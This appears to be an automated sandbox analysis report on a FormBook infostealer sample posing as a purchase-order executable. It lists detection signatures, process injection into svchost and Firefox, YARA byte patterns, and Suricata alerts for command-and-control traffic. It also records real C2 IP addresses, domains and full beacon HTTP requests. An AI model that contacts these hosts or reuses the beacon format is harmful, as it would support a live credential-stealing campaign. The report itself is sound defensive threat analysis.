Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 09110124 EXPRESS SYSTEM-SESB24066.exe

Overview

General Information

Sample name:PO 09110124 EXPRESS SYSTEM-SESB24066.exe
Analysis ID:1508450
MD5:c029364519d917e71ec6e8be9301755b
SHA1:edbf0638c76e9ab5d26f84d98c94b23757685da1
SHA256:ecde745484cbfc4aa7ff0de292907acd4bab3b772641f09815030a2d0887073f
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO 09110124 EXPRESS SYSTEM-SESB24066.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe" MD5: C029364519D917E71EC6E8BE9301755B)
    • svchost.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ZQphKCYQofBW.exe (PID: 3872 cmdline: "C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 7372 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • ZQphKCYQofBW.exe (PID: 1880 cmdline: "C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13fcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.350000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.350000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.350000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.350000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine|base64offset|contains: u], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ParentImage: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ParentProcessId: 7280, ParentProcessName: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ProcessId: 7304, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine|base64offset|contains: u], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ParentImage: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ParentProcessId: 7280, ParentProcessName: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ProcessId: 7304, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-10T08:48:13.436745+020020507451Malware Command and Control Activity Detected192.168.2.44973647.57.185.22780TCP
            2024-09-10T08:48:37.031525+020020507451Malware Command and Control Activity Detected192.168.2.44974189.58.49.180TCP
            2024-09-10T08:48:59.099041+020020507451Malware Command and Control Activity Detected192.168.2.449745154.23.184.24080TCP
            2024-09-10T08:49:12.745705+020020507451Malware Command and Control Activity Detected192.168.2.44974985.159.66.9380TCP
            2024-09-10T08:49:26.732425+020020507451Malware Command and Control Activity Detected192.168.2.449753185.173.111.7680TCP
            2024-09-10T08:49:40.352802+020020507451Malware Command and Control Activity Detected192.168.2.449757203.161.43.22880TCP
            2024-09-10T08:49:53.716519+020020507451Malware Command and Control Activity Detected192.168.2.449761161.97.168.24580TCP
            2024-09-10T08:50:11.450675+020020507451Malware Command and Control Activity Detected192.168.2.449765172.96.191.3980TCP
            2024-09-10T08:50:24.780304+020020507451Malware Command and Control Activity Detected192.168.2.449769104.21.20.12580TCP
            2024-09-10T08:50:38.980037+020020507451Malware Command and Control Activity Detected192.168.2.44977343.242.202.16980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeReversingLabs: Detection: 26%
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeVirustotal: Detection: 33%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeJoe Sandbox ML: detected
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZQphKCYQofBW.exe, 00000002.00000002.3540260087.00000000004EE000.00000002.00000001.01000000.00000004.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945115829.00000000004EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CDD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_002CDD92
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_00302044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00302044
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0030219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0030219F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003024A9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_002F6B3F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_002F6E4A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002FF350
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FFD47 FindFirstFileW,FindClose,0_2_002FFD47
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002FFDD2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025AC380 FindFirstFileW,FindNextFileW,FindClose,3_2_025AC380
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then xor eax, eax3_2_02599B30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then mov ebx, 00000004h3_2_02D904E7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 89.58.49.1:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 185.173.111.76:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 47.57.185.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 104.21.20.125:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 203.161.43.228:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.golbasi-nakliyat.xyz
            Source: DNS query: www.kckartal.xyz
            Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
            Source: Joe Sandbox ViewIP Address: 172.96.191.39 172.96.191.39
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0030550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_0030550C
            Source: global trafficHTTP traffic detected: GET /w9nd/?chHT=9dRK0h7YIJsGSRnhz7V9NsNj7P/k9yHBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtqUckbqGSyTGH7gwVeueowUmtWPR1ijKwEtw=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.726075.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xcfw/?chHT=bjW1F6zberoR1D3Y/XEIKVRbrrv+ro5pHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFAwVPxBpt2RsyemRiOMSAY7rdemSMqYxcM/3o=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.freepicture.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p39s/?chHT=1N9NMDNpm9Czos0vDuAaxfkyacdu5dmrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV81dYi+UjaGlO+WfnitkWEaBCkm6SMdBoGO9M=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hm62t.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /k2vl/?chHT=TxupyKnRMohPPcJUOXYiFfym6FYb3U4dGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bNPEHR5AP8gY607qfZYhRyRQHcihpFxABXgI=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.golbasi-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mfgamecompany.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftr3/?chHT=7ghTfXuNFdv7bt0cfac8sWAvvgA+iGAttJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+mp46J/Wf0OAVor6kOMcVXs+ErAF0mdrKXqQ=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.quilo.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wjff/?chHT=4KVKOjLTUXvpTd2tw7YgFu7M88ozG6iAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCYIQBHe5WIuBUoW+30QfUJAtM0OLXkJ34ecY=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.qiluqiyuan.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lkx/?chHT=RihUS+ZcBcWtP49cUqKa3/5xmWqGYNk0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4ueBHr6qafW/u83WMg9sFtSHOnpje/7KsHpWM=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.bola88site.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /h5qr/?chHT=/bmdZ0vLXnogocV0iYIh9qPv22C1+ePhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5evw/1eyPyHW7+NkDn/WIzzX8wvew4kJYzT8Us=&bd=rj1X_pBPLTnXd0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kckartal.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
